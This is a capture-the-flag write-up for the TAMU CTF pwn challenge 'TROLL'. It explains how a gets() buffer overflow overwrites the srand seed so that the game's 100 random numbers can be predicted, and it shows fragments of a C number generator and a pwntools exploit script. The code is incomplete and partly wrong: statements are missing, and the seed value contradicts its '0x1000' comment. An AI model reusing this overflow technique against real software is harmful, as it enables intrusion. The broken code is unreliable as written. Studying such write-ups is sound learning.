Tags: pwn 


## TROLL (50pts) ##


In this task we are supposed to win a game by guessing the next 100 random numbers , looking at the source code we can see the vulnerable gets function , after that we are setting the seed
value to the time and finally the beginning of the loop and generating the random numbers and questions each time .


My idea was to overwrite the seed value with our own value than BINGO we can generate the next random numbers and win the game , i have done things manually , i entered a unique seaquence and than observed with gdb if i have overwritten where the seed value is stored

My input :


I have entered a sequence of alphabet characters and stopped in the call of srand function , you can see te RDI register(where the 1st argument passed to a function is stored) hold the value of "MMMM"
so if we replace "MMMM" with the value we want , this value will be the seed for the random numbers.

I have written this little C program to generate 100 random numbers using our chosen seed and stored them in a file :

int main(int argc, char *argv[]){
int i=0;
int seed=3472328296227680305 //0x1000 in decimal
int a=rand()% 100000 + 1;
return 0;

After that i have written this exploit to overwrite the seed value with 0x1000 and answer the questions using the numbers we have generated

from pwn import *
p.recvuntil("Who goes there?")
log.info("Sent First payload")
for line in answers:
p.recvuntil("What is it?")
log.info("sending answer: "+line)

Note: the offset in the remote server is different, so i had to guess it xD However we got our flag :


This is the first time writing a pwn writeup so i hope you enjoyed it , any questions you can find me on twitter @BelkahlaAhmed1

Original writeup (https://github.com/kahla-sec/CTF-Writeups/tree/master/TAMU%20CTF/TROLL).